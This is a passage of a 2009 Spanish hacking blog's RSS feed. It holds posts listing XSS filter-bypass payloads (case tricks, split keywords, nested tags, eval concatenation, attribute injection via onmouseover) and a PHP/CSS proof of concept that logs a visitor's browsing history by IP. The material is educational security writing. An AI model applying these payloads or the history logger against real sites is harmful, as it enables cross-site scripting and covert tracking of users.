italic;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-style: italic;"&gt;- &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Eliminación de caracteres especiales&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&amp;lt;script&gt;alert(&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;code style="font-style: italic; color: rgb(51, 204, 0);"&gt;String.fromCharCode(88,83,83))&lt;span style="font-family:Georgia,serif;"&gt;;&amp;lt;/script&gt; Siendo los números el valor del caracter en ASCII&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;-Filtro Strip_Tags (puedes meter algunos tags, pero otros como &amp;lt;script&gt; los bloquea&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;p style="backgroun&lt;span style="font-weight: bold;"&gt;d: url("JavaScript:alert(/xss/);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="font-style: italic; color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;-Supresión de ciertas expresiones o palabras&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;Salto de linea &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;JavaScr&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;ipt:alert(1);&lt;br /&gt;&lt;br /&gt;Inclusión de otra palabra tabú en mitad de la que queramos&lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;  &lt;/span&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;java&amp;lt;script&gt;script:alert(1);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;Eliminación de funciones y expresiones dentro del código javascript&lt;br /&gt;javascript:alert(eval('Saltando'+' Bypass'));&lt;/span&gt;&lt;br /&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="font-style: italic; color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:Georgia,serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;===============================================&lt;br /&gt;&lt;br /&gt;Hasta aquí nuestra pequeña colección... realmente quisiera que me mandarais más al correo de contacto, las publicaré añadiendo el nombre del que me las haya mandado.&lt;br /&gt;&lt;br /&gt;PD: Aqui teneis muuuuuuuuuuuuuuuuuuchas más formas interesantes:&lt;br /&gt;&lt;a href="http://ha.ckers.org/xss.html"&gt;XSS CheatSheet&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-7500785082914717119?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?a=oympVoUn"&gt;&lt;img src="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?d=41" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/m_rN3vHHVi4" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-02-20T03:51:38.121+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/02/xss-cheatsheet.html</feedburner:origLink></item><item><title>XSS: Más formas de realizar un bypass</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/G1hPtFRwpGk/xss-mas-formas-de-realizar-un-bypass.html</link><category>XSS</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Tue, 17 Feb 2009 20:40:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-5874563511931909547</guid><description>Saludos!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Son las 5:41 AM y mañana tengo clase de "Citología e Histología Animal y Vegetal", despues "Bioquímica", "Física", "Bioestadística" y por último prácticas de laboratorio de BQ... total que mi jornada empieza a las  9 de la mañana... así que imagenese el panorama: ahora no me puedo dormir porque no me despertaré. Por ello, voy a hacer algo productivo añadir un par de formas más sobre como saltar determinados filtros, y ya mañana cuando vuelva de clase (puesto que tengo huecos de varias horas) a mi habitáculo numerado como 302.... me pondré a juntar todos los métodos (es decir, extraer de aquel paper que hice ya time) y haré una especie de chuleta para tener en los marcadores por si nos hace falta ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Allá que vamos.&lt;br /&gt;&lt;br /&gt;__________________________________________________&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;·Filtros basados en la supresión de palabras o expresiones concretas:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;A este respecto, he encontrado dos formas curiosas de hacer el bypass. Una es aprovechando que la función de filtrado es Case Sensitive, es decir, que no distingue entre mayúsculas y minúsculas. En estos casos, si por ejemplo el filtro suprime la palabra "Javascript", nosotros podemos usar JaVaSCRiPT, y nuestro navegador lo dará por bueno :)&lt;br /&gt;&lt;br /&gt; Otra posible forma que se me ocurre es el de meter un \n en mitad de la palabra, es decir, hacer:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;JavaScr&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;ipt:alert(1);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;    &lt;/span&gt;&lt;/span&gt;Normalmente los navegadores suelen dar esto por válido y empalman la palabra automáticamente (siempre hay excepciones). Otro bypass u ofuscación de palabras puede ser  el meter otra palabra tabú en mitad de la que nosotros queremos. Siguiente el ejemplo de la prohibición de Javascript:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;java&amp;lt;script&gt;script:alert(1);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;   De esta forma, el filtro eliminará &amp;lt;script&gt; y empalmará el texto "javascript".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;·&lt;span style="font-weight: bold;"&gt;Filtrado de expresiones, atributos y funciones&lt;br /&gt;&lt;br /&gt;    &lt;/span&gt;En algunas ocasiones el sistema sí permite el uso de código JS, pero meten un filtro para que suprima ciertas funciones que podrían volverse... "problemáticas". Para ello podemos usar eval(), metemos en ella la palabra por partes y despues concatenamos:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 204, 0);"&gt;javascript:alert(eval('Saltando'+' Bypass'));&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;·Adhesión de caracteres al final de la cadena&lt;br /&gt;&lt;br /&gt;    &lt;/span&gt;Este curioso tipo de filtro me lo encontré en una web donde al hacer búsquedas, creaba un link a una foto del tipo &amp;lt;a href="http://example.org/index.php?z=LoqueBuscasSearched"&gt;. Me filtraba los &amp;lt;&gt;, así que la idea de siempre de hacer "&gt; no podía ser. El caso es que simplemente puse " para cerrar el href y despues puse un evento onmouseover con el JS y para poder evadirme el Searched"&gt;, simplemente me inveté un atributo. Entonces introduje esto:&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;foo"  onmouseover=alert(1); bio="&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  Y el resultado fue:&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&amp;lt;a href="http://example.org/index.php?z=foo" onmouseover="alert(1);" bio="Searched"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, son las 6:20AM ahora mismo (me fui a comer algo tenía hambre XD) y no se me ocurre ningún otro bypass, cuando me acuerde lo añadiré sobre la CheatSheet.&lt;br /&gt;&lt;br /&gt;Byt3z a todos&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-5874563511931909547?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?a=XKpGsLYf"&gt;&lt;img src="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?d=41" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/G1hPtFRwpGk" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-02-18T06:25:50.519+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/02/xss-mas-formas-de-realizar-un-bypass.html</feedburner:origLink></item><item><title>CSS Attacks I : CSS History Hack</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/yrLivvE4OQI/css-attacks-i-css-history-hack.html</link><category>CSS Attacks</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Tue, 17 Feb 2009 11:16:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-5017749318626425842</guid><description>&lt;style&gt;code{ color:lime; }&lt;/style&gt;Saludos!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Este es la primera publicación que voy a hacer sobre el tema,  y va ser más bien una pequeña introducción al tema con un ejemplo bien sencillo sacado del scanner en CSS que me linkeó S e t h hace un par de días.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Bien,  a qué nos referimos cuando hablamos de CSS attacks... nos referimos a aquellos ataques que, o bien se basan en CSS (Cascade Style Sheet) o bien lo usan como vector. Un ejemplo, que en cierto modo usa de CSS para llevarse a cabo, es el cickjacking, tema sobre el cual hablaremos en otras entregas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  El peligro de los ataques CSS reside en que en principio no hay forma de protección, ya que si tú visitas una web maliciosa, normalmente si se intenta realizar algún tipo de ataque, éste se intenta en un 99% a través de malware en Javascript. Por el contrario, si un usuario bloqueaba la ejecución de código JS, estaba "blindado" contra ataques de este tipo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Es a finales de verano/principio de otoño cuando Lix me estuvo acribillando a links sobre esto de usar CSS para ataques (él en concreto me estuvo hablando de aquello del clickjacking), y sí, fue una especie de "revolución bloggera", era raro el blog que no había publicado algo sobre el tema. Y es que, ciertamente, cuando una vulnerabilidad se le da mucha fama es lo que pasa. Cuando hoy en día encontramos vulnerabilidades de gran importancia... si no se las promociona quedan en un grupo reducido de bugtraqs y advisorys de las webs, como no, de habla inglesa.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Bueno, retornando a lo que es el tema en sí, yo he querido ejemplificar (más que nada para abrir boca y que los lectores esperen con mayor ansia los siguiente capitulos sobre el tema) algo de ataques en CSS con un logger de sitios visitados (incido, la idea no es mía, la ví en un lnk que me ruló S e t h, pero el PoC sí es mío). &lt;br /&gt;&lt;br /&gt;  Como todos sabemos, los enlaces de las webs se pueden "embellecer" aplicandole atributos CSS como pueden ser hover (para que cambie el diseño al depositar el cursor sobre el link), visited, etc... Y también sabemos, que existen ciertos elementos en los cuales podemos hacer referencias a elementos externos. Hacia estos elementos externos salen peticiones GET desde nosotros para recopilar su contenido. Bien, ¿y que pasa con esto?. Pues que si se hacen peticiones de tipo GET hacia elemtnos del exterior... podemos incluir el seteo de variables GET y de esta forma logear cierta información, hacer que el usuario realice algún tipo de acción, etc...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Si nosotros declaramos en a:visited que mande una petición a otro archivo nuestro, y ponemos un listado de webs, podremos loggear en qué webs ha entrado. Aquí os dejo la prueba de concepto:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;head&gt;&amp;lt;title&gt;Proof of Concept -&gt; CSS History Hack&amp;lt;/title&gt;&amp;lt;/head&gt;&lt;br /&gt;&amp;lt;body&gt;&lt;br /&gt;&amp;lt;style&gt;&lt;br /&gt;a.link1:visited{&lt;br /&gt;background: url(poc.php?visited=1);&lt;br /&gt;}&lt;br /&gt;a.link2:visited{&lt;br /&gt;background: url(poc.php?visited=2);&lt;br /&gt;}&lt;br /&gt;a.link3:visited{&lt;br /&gt;background: url(poc.php?visited=3);&lt;br /&gt;}&lt;br /&gt;&amp;lt;/style&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;h1&gt;Proof of Concept for CSS Hystory Hack&amp;lt;/h1&gt;&lt;br /&gt;&amp;lt;br&gt;&amp;lt;br&gt;&amp;lt;center&gt;&lt;br /&gt;&amp;lt;a href="http://google.com" class="link1"&gt;Google&amp;lt;/a&gt;&amp;lt;br&gt;&lt;br /&gt;&amp;lt;a href="http://0verl0ad.blogspot.com" class="link2"&gt;0V3RL04D 1N TH3 N3T&amp;lt;/a&gt;&amp;lt;br&gt;&lt;br /&gt;&amp;lt;a href="http://unam.mx" class="link3"&gt;Primera web que me salió por google XD&amp;lt;/a&gt;&amp;lt;br&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;$file = $_SERVER['REMOTE_ADDR'].'.txt';&lt;br /&gt;$abierto = fopen($file, a);&lt;br /&gt;switch($_GET['visited']){&lt;br /&gt;case '1':&lt;br /&gt;fwrite($abierto," Google,");&lt;br /&gt;break;&lt;br /&gt;case '2':&lt;br /&gt;fwrite($abierto, "\nMi blog,");&lt;br /&gt;break;&lt;br /&gt;case '3':&lt;br /&gt;fwrite($abierto, "\nUnam.mx");&lt;br /&gt;break;&lt;br /&gt;}&lt;br /&gt;fclose($abierto);&lt;br /&gt;echo '&amp;lt;a href='.$_SERVER['REMOTE_ADDR'].'.txt&gt; Click aqui para ver tu historial &amp;lt;/a&gt;';&lt;br /&gt;?&gt;&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-5017749318626425842?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?a=sg8dc1vb"&gt;&lt;img src="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?d=41" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/yrLivvE4OQI" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-02-17T20:40:38.393+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/02/css-attacks-i-css-history-hack.html</feedburner:origLink></item><item><title>Otra vez en ON</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/Q_pLwOjKsPg/otra-vez-en-on.html</link><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Mon, 16 Feb 2009 02:37:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-6699570025387350223</guid><description>Saludos lectores... (si es que tengo alguno XD).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Cierto es que he descuidado bastante el blog, si bien las circunstancias se escapan del objetivo del posts (lo siento), sí que voy a pedir disculpas a las pocas personas que leían algo de aquí y que dejaron de leer por mis propios problemas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Ahora he vuelto a publicar aquí, eso sí cambiando ciertas cosas, como mi cambio de nick. En principio no sé muy bien con quien continuar publicando, pero llevo un par de días volviendo a leer toda la movida que se montó a finales de verano/principio de otoño con el tema del clickjacking (Menuda semana me dió mi bibliotecario preferido AKA Lix; por cierto tengo ganas de volver a hablar contigo, he tenido que suplirte por multis con seth y plaga, pero no es lo mismo que tus charlas repletas de links XDDD). Sí aquel tema que se propagó como el fuego en gasolina por todos los blogs. Algunos dirán que es materia ya conocida... pero a día de hoy seguimos haciendo papers sobre SQL injection y también es tema ya trabajado desde hace años.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Bueno, la cuestion es que en dos días que estaba releyendo referencias que me dió Lix, y hablando con S e t h, resulta que ahora el clickjacking ha sido incluido en una categoría de ataque denominada "CSS Attacks" (Si sí, CSS de Hojas Estilo Cascada) por algunos autores, y bueh leyendo por ahí he seguido investigando esto de los ataques utilizando CSS. Así que estaba pensando en hacer un ciclo de publicaciones (tres  o cuatro) similar al que ya realicé hace tiempo sobre el protocolo HTTP, ya que en español apenas he encontrado unas pocas referencias y las explicaciones son muy simplesm (prometo poner PoCs)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Otra idea que he tenido al observar códigos de malwares en JavaScript y XSS es la idea de publicar un par más de formas de realizar bypassing a filtros (algunas formas descubiertas por experiencia propia y otras sacadas de sources de otras personas), además de hacer una CheatSheet como recopilación esquematizada de todos los expuestos en el blog.&lt;br /&gt;&lt;br /&gt;  Y por último, quisiera saber si hay lectores que sigan el blog, así que por favor si estás leyendo esto (de aquí hasta el 16 de Marzo) mandame un mail a mi dirección (Camaleon__81 [\at/] Hotmail.com) o postea en este mismo thread. También quisiera saber qué es lo que más te gusta del blog y qué temas quieres que tratemos de aquí a los próximos meses (S e t h SQL no me lo pidas que ya te conozco :P, hay mucho en la red sobre eso)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Byt3z&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-6699570025387350223?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?a=PnLLHsDr"&gt;&lt;img src="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?d=41" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/Q_pLwOjKsPg" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-02-16T11:51:30.945+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/02/otra-vez-en-on.html</feedburner:origLink></item><copyright>Copyright: "Vengador de las Sombras"</copyright><media:credit role="author">Copyright: "Vengador de las Sombras"</media:credit><media:rating>nonadult</media:rating><media:description type="plain">Vengador de las Sombras 's Podcast</media:description></channel></rss>
